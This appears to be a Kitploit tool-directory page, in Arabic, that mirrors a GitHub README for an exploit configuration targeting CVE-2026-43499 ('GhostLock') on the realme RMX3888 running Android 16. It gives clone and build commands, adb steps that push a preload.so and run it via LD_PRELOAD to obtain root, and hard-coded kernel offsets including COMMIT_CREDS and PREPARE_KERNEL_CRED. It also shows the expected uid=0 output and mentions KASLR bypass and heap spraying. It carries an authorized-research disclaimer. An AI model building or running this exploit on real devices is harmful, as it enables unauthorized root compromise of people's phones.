Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/bailan766/rmx3888-cve-2026-43499-config
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالأمن الجوالالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubbailan766/rmx3888-cve-2026-43499-config

rmx3888-cve-2026-43499-config

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إعدادات استغلال CVE-2026-43499 لجهاز realme RMX3888 (أندرويد 16) - 20 إزاحة نواة مُوثَّقة

عرض المستودع
52منذ 27 أياملم تتم المراجعة بعد

إعداد استغلال CVE-2026-43499 لجهاز realme RMX3888

معلومات الجهاز

  • العلامة التجارية/الطراز: realme RMX3888
  • إصدار أندرويد: 16 (SDK 36)
  • معرّف البناء: BP2A.250605.015
  • النواة: Linux 6.1.141-android14-11-o-gffc54a6d2287
  • نظام الشرائح: Qualcomm SM8650 (Snapdragon 8 Gen 3)
  • المعمارية: ARM64 (aarch64)

نظرة عامة

يحتوي هذا المستودع على ملفات الإعداد الكاملة لاستغلال CVE-2026-43499 (GhostLock) الموجه لجهاز realme RMX3888. تم استخراج جميع إزاحات النواة والتحقق منها من ملف boot.img الخاص بالجهاز.

الميزات

✓ 20 إزاحة نواة موثقة مستخرجة من vmlinux
✓ تسجيل لحظي مع O_SYNC + fsync لضمان السلامة عند انهيار النواة
✓ إعداد مخصص للجهاز لطراز RMX3888
✓ سكربت تجميع بنقرة واحدة مع كشف تلقائي لـ NDK
✓ توثيق شامل مع أدلة بناء

الملفات المرفقة

ملفات الإعداد

  • arget.h - إزاحات النواة المخصصة للجهاز (20 إزاحة موثقة)
  • common.h - إعداد البناء مع دمج التسجيل

ealtime_log.h - تنفيذ التسجيل اللحظي

التوثيق

  • BUILD_GUIDE.md - دليل تجميع شامل

eport.md - تقرير تحليل مفصل (الجولة 1)

ound2_report.md - تقرير الإعداد (الجولة 2)

  • ROUND2_STATUS.md - ملخص حالة التنفيذ
  • compile_status.json - حالة البناء بتنسيق قابل للقراءة آليًا

السكربتات

  • compile_rmx3888.sh - سكربت تجميع بنقرة واحدة

البدء السريع

المتطلبات الأساسية

  • Android NDK r26d أو أحدث
  • بيئة Git Bash أو Linux/WSL أو Termux

التجميع

root@kitploit:~
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh

في بيئة Git Bash على ويندوز، يكتشف السكربت تلقائيًا مسار SDK الافتراضي المستخدم بواسطة Android Studio وأدوات سطر الأوامر: /c/Android/Sdk/ndk/*.

ملاحظة: تستخدم ASHMEM_MISC_FOPS وASHMEM_COMPAT_IOCTL وCOPY_SPLICE_READ حاليًا قيمًا احتياطية متوافقة مع البناء في ملف الترويسة الخاص بجهاز RMX3888. استبدل هذه القيم بإزاحات RMX3888 الموثقة من vmlinux قبل الاعتماد على سلوك وقت التشغيل.

الاستخدام

root@kitploit:~
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/

# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so

# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# Check logs
adb shell cat /sdcard/Download/log_*.txt

الإزاحات الرئيسية

الإزاحات الرئيسية أدناه مستخرجة من النواة 6.1.141. راجع الملاحظة أعلاه بخصوص القيم الاحتياطية المتوافقة مع البناء التي ما تزال بحاجة إلى تحقق خاص بجهاز RMX3888.

root@kitploit:~
#define KIMAGE_TEXT_BASE        0xffffffc008000000ULL
#define INIT_TASK_OFF           0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF         0x0126bbe0ULL
#define COMMIT_CREDS            0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED     0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets

ميزات التسجيل

توفر وحدة التسجيل اللحظي المدمجة ما يلي:

  • المسار الأساسي للسجل: /sdcard/Download/log_.txt
  • المسار الاحتياطي: /data/local/tmp/log_.txt
  • آمن ضد انهيار النواة: يستخدم O_SYNC + fsync() للكتابة الفورية على القرص
  • إدخالات بطابع زمني: تتضمن جميع إدخالات السجل طوابع زمنية دقيقة
  • نسخة على stderr: تُخرج السجلات أيضًا إلى stderr لاستخدامها مع adb logcat

النتائج المتوقعة

استغلال ناجح

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...

مخرجات ملف السجل

` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt

[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `

استكشاف الأخطاء وإصلاحها

راجع BUILD_GUIDE.md للحصول على تعليمات تفصيلية لاستكشاف الأخطاء وإصلاحها، بما في ذلك:

  • أخطاء التجميع
  • أعطال وقت التشغيل
  • مشاكل تجاوز KASLR
  • حظر سياسات SELinux

إشعار أمني

⚠️ تحذير: هذا الإعداد مخصص لأغراض البحث الأمني المصرح به فقط.

  • استخدمه فقط على الأجهزة التي تملكها
  • لا توزع الملفات الثنائية المجمعة دون إذن
  • التزم بممارسات الإفصاح المسؤول
  • قد تحتوي ملفات السجل على معلومات نظام حساسة

التفاصيل التقنية

عملية الاستخراج

  1. فك ضغط Boot.img باستخدام محلل Android Boot Image v4
  2. استخراج vmlinux باستخدام vmlinux-to-elf (102,871 رمزًا)
  3. تحليل 99,580 رمزًا صالحًا وفحصها
  4. تحقق متقاطع من 20 إزاحة حرجة
  5. التحقق من الإزاحات عبر فحوصات اتساق عناوين الرموز

التحقق من الإزاحات

  • تم تأكيد العنوان الأساسي للنواة: 0xffffffc008000000
  • تم التحقق من جميع عناوين الرموز مقابل تخطيط الذاكرة
  • مرجعية متقاطعة مع جهاز مرجعي (Google Pixel tokay)
  • معدل نجاح استخراج 100% (20/20 إزاحة)

المراجع

  • CVE-2026-43499: GhostLock - ثغرة الاستخدام بعد التحرير (UAF) في مُخصّص Ion
  • مصدر الاستغلال: https://github.com/NebuSec/CyberMeowfia
  • الجهاز المستهدف: realme RMX3888 (Snapdragon 8 Gen 3)

الترخيص

يتم توفير هذا الإعداد لأغراض تعليمية وبحث أمني فقط.

إخلاء مسؤولية

يحتوي هذا المستودع على مواد بحث أمني. لا يتحمل المؤلفون والمساهمون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا الكود. استخدمه على مسؤوليتك الخاصة وفقط على الأجهزة التي تملكها أو لديك إذن صريح لاختبارها.


تاريخ الإنشاء: 2026-07-23
إصدار النواة: 6.1.141-android14-11-o-gffc54a6d2287
التحقق من الإزاحات: 100% (20/20)
الحالة: جاهز للتجميع

تنزيل الأداة